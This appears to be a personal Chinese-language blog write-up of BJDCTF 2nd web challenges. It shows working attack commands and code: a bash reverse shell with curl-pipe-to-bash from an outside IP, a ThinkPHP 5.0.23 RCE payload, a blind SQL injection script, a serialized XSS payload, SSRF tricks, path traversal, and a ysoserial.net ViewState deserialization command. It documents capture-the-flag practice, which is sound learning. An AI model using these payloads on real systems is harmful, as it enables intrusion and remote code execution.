記錄一下,以後忘記了還能看看
fake google-飛機票
duangShell
- .index.php.swp源碼泄露
一進去提示我們:how can i give you source code? .swp?!
,獲取源碼後,利用vim再把它改回去就行,直接打開會亂碼:vim -r index.php.swp
恢復。
因爲exec()無回顯,而且沒有禁curl。所以可以反彈shell~~
- 先查看ip地址
ifconfig
- 進入/var/www/html寫一個txt文件。
bash -i >& /dev/tcp/ip/port 0>&1
ip就是本地ip,端口隨便寫一個- 監聽端口1234
nc -lvp 1234
- 再post一個girlfriend的值
girl_friend=curl 174.1.145.235/b.txt|bash
- 直接cat /flag是不會出來的
grep -r "flag{" /etc
old-hack
題目題是thinkphp5,拿通用thinkphp5的payload打了下,然後發現版本5.0.23
然後拿5.0.23打了下,沒看到flag,還以爲我沒打通,結果在最上面。。
/index.php?s=captcha
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat /flag
簡單注入
hint.txt有語句提示:select * from users where username='$_POST["username"]' and password='$_POST["password"]';
對sql的注入還不太瞭解,放一下大師傅的二分注入
import requests
import time
url = "http://523c9df3-1d44-44e8-bcc5-2a8ad35c3ff4.node3.buuoj.cn/"
temp = {}
password = ""
for i in range(1,1000):
time.sleep(0.06)
low = 32
high =128
mid = (low+high)//2
while(low<high):
payload = '^ (ascii(substr((password),%d,1))>%d)#' % (i,mid)
temp={"username":"admin\\","password": payload}
r = requests.post(url,data=temp)
print(low,high,mid,":")
if "P3rh4ps" in r.text:
low = mid+1
else:
high = mid
mid =(low+high)//2
if(mid ==32 or mid ==127):
break
password +=chr(mid)
print(password)
print("password=",password)
二分注入還是快的= =
XSS之光
dirb掃一下,發現有git漏洞
反序列化之PHP原生類的利用
也是第一次接觸到反序列化原生類
利用buu裏面自帶的內網xss,搞得。
<?php
$a = new Exception("<script src=http://xss.buuoj.cn/bL6BFw></script>");
echo urlencode(serialize($a));
序列化:
O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A48%3A%22%3Cscript+src%3Dhttp%3A%2F%2Fxss.buuoj.cn%2FbL6BFw%3E%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A3%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
假豬套天下第一
抓包請求下發現L0g1n.php。
然後套娃:
headers信息
改cookie時間
Client-ip:127.0.0.1 //這裏XFF用不了
Referer:gem-love.com //來源地址
User-Agent:Commodore 64 //使用的系統
from:[email protected] //請求方郵箱
via:y1ng.vip //請求方代理
文件探測
一貫尿性= =。header裏面有信息,提示了home.php,robots裏還提示了admin.php,但是隻允許本地訪問。
home.php裏可以用僞協議讀取system.php的源碼,如果輸入了其他的後頭會拼接.fxxkyou!
home.php?file=php://filter/read=convert.base64-encode/resource=system
base64解密後得到源碼,代碼審計
system.php
<?php
error_reporting(0);
if (!isset($_COOKIE['y1ng']) || $_COOKIE['y1ng'] !== sha1(md5('y1ng'))){ //檢查cookie
echo "<script>alert('why you are here!');alert('fxck your scanner');alert('fxck you! get out!');</script>";
header("Refresh:0.1;url=index.php");
die;
}
$str2 = ' Error: url invalid<br>~$ ';
$str3 = ' Error: damn hacker!<br>~$ ';
$str4 = ' Error: request method error<br>~$ ';
$filter1 = '/^http:\/\/127\.0\.0\.1\//i'; //前面必須是127.0.0.1
$filter2 = '/.?f.?l.?a.?g.?/i'; //不能包含flag
if (isset($_POST['q1']) && isset($_POST['q2']) && isset($_POST['q3']) ) {
$url = $_POST['q2'].".y1ng.txt";
$method = $_POST['q3'];
$str1 = "~$ python fuck.py -u \"".$url ."\" -M $method -U y1ng -P admin123123 --neglect-negative --debug --hint=xiangdemei<br>";
echo $str1;
if (!preg_match($filter1, $url) ){
die($str2);
}
if (preg_match($filter2, $url)) {
die($str3);
}
if (!preg_match('/^GET/i', $method) && !preg_match('/^POST/i', $method)) {
die($str4);
}
$detect = @file_get_contents($url, false);
print(sprintf("$url method&content_size:$method%d", $detect));
}
?>
- q1無限制
- q2傳
http://127.0.0.1/admin.php?a=
把後面銜接的.y1ng.txt接過去。 - q3傳GET或者POST,但是因爲後面輸出是%d是個整數,要對他進行轉義利用%%轉義把他轉爲%號加d:
GET%s%
admin.php
<?php
error_reporting(0);
session_start();
$f1ag = 'f1ag{s1mpl3_SSRF_@nd_spr1ntf}'; //fake
function aesEn($data, $key){
$method = 'AES-128-CBC';
$iv = md5($_SERVER['REMOTE_ADDR'],true);
return base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}
function Check(){
if (isset($_COOKIE['your_ip_address']) && $_COOKIE['your_ip_address'] === md5($_SERVER['REMOTE_ADDR']) && $_COOKIE['y1ng'] === sha1(md5('y1ng')))
return true;
else
return false;
}
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) { //檢查是否是本地
highlight_file(__FILE__);
} else {
echo "<head><title>403 Forbidden</title></head><body bgcolor=black><center><font size='10px' color=white><br>only 127.0.0.1 can access! You know what I mean right?<br>your ip address is " . $_SERVER['REMOTE_ADDR'];
}
$_SESSION['user'] = md5($_SERVER['REMOTE_ADDR']);
if (isset($_GET['decrypt'])) {
$decr = $_GET['decrypt'];
if (Check()){ //檢查cookie
$data = $_SESSION['secret'];
include 'flag_2sln2ndln2klnlksnf.php';
$cipher = aesEn($data, 'y1ng'); //調用aesEn
if ($decr === $cipher){
echo WHAT_YOU_WANT;
} else {
die('爬');
}
} else{
header("Refresh:0.1;url=index.php");
}
}
else {
//I heard you can break PHP mt_rand seed
mt_srand(rand(0,9999999));
$length = mt_rand(40,80);
$_SESSION['secret'] = bin2hex(random_bytes($length));
}
只要完成前面的if,所以要check()成立,並且`$decr===$cipher`
$cipher = aesEn($data, 'y1ng'); 只要令他返回的值相等就行
$_SERVER['REMOTE_ADDR']
就是前面得174.0.222.75.
function aesEn($data, $key){
$method = 'AES-128-CBC';
$iv = md5($_SERVER['REMOTE_ADDR'],true);
return base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}
function aesEn($data, $key)
{
$method = 'AES-128-CBC';
$iv = md5('174.0.222.75', true);
return base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}
$cipher = aesEn('NULL', 'y1ng');
echo urlencode($cipher); //70klfZeYC+WlC045CcKhtg== 要將最後的值轉碼
如果運行的時候報Call to undefined function openssl_encrypt()錯,在php.ini搜索下;extension=php_openssl.dll
去掉前面得分號即可。或者直接在線運行代碼。
EasyAspDotNet
趙師傅的題真頂。
瞭解可以看這篇文章:如何藉助ViewState在ASP.NET中實現反序列化漏洞利用
攻擊的文章:玩轉 ASP.NET VIEWSTATE 反序列化攻擊、建立無檔案後門
進去之後發現圖片路徑:path=4.gif
,看到別的大佬說有文件包含,讀取web.config文件。
一個個試直到:path=../../web.config
發現被當作圖片讀取,curl下載。
curl -O http://65b7c96b-2005-4b6b-ba0f-485176af77c7.node3.buuoj.cn/ImgLoad.aspx?path=../../web.config
ExploitClass.cs、System.Web.dll、System.dll文件
ysoserial.net,直接下載帶exe的
.\ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;./System.dll;./System.Web.dll" --generator="CA0B0334" --validationalg="SHA1" --validationkey="47A7D23AF52BEF07FB9EE7BD395CD9E19937682ECB288913CE758DE5035CF40DC4DB2B08479BF630CFEAF0BDFEE7242FC54D89745F7AF77790A4B5855A08EAC9" decryptionKey="B0E528C949E59127E7469C9AF0764506BAFD2AB8150A75A5"
如果用brup注意__VIEWSTATE參數的編碼問題
拖了好多天,終於復現完了,明天可以做別的事情了~~~~
歡迎來我個人博客來玩(友鏈)
參考
BJDCTF 2nd EasyAspDotNet WriteUp
第二屆BJDCTF 2020 全部WEB題目 Writeup
Konmu
玩轉 ASP.NET VIEWSTATE 反序列化攻擊、建立無檔案後門
如何藉助ViewState在ASP.NET中實現反序列化漏洞利用
headers信息